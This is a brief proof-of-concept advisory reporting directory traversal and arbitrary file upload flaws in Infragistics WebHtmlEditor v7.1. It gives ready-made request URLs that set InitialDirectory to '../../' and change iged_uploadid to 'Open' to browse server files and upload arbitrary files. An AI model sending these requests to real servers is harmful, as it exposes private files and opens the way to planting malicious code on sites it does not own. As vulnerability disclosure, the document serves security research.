----------------------------------------------------------------------------------------------------------------------------- Infragistics WebHtmlEditor.v7.1(InitialDirectory,iged_uploadid ) directory Traversal and Arbitrary File upload vulnerability ----------------------------------------------------------------------------------------------------------------------------- proof of concept by KyoungChip, Jang ( SpeeDr00t ) [*] the bug : directory Traversal and Arbitrary File upload vulnerability [*] application : Infragistics WebHtmlEditor.v7.1 [*] Vendor URL : http://www.infragistics.com [*] homepage : cafe.naver.com/cwithme [*] company : sk юн4sec [*] Group : canvasTeam@SpeeDr00t [*] Thank for : my wife(en hee) , my son(ju en, do en ), Zero-0x77, hoon # directory Traversal vulnerability A directory traversal vulnerability exists in Infragistics WebHtmlEditor.v7.1 which allows a remote user to view files local to the target server. The parameters of the InitialDirectory ( InitialDirectory =../../ ) This form of attack can be manipulated directory travel. poc ) InitialDirectory = ../../ ex) http://server/test.aspx?lang=&iged_uploadid=InsertImage&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor # Arbitrary File upload vulnerability The parameters of the InsertImage the iged_uploadid can upload image files, but Open an attacker to change the parameters iged_uploadid Arbitrary File upload it enables. http://server/test.aspx?lang=&iged_uploadid=Open&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor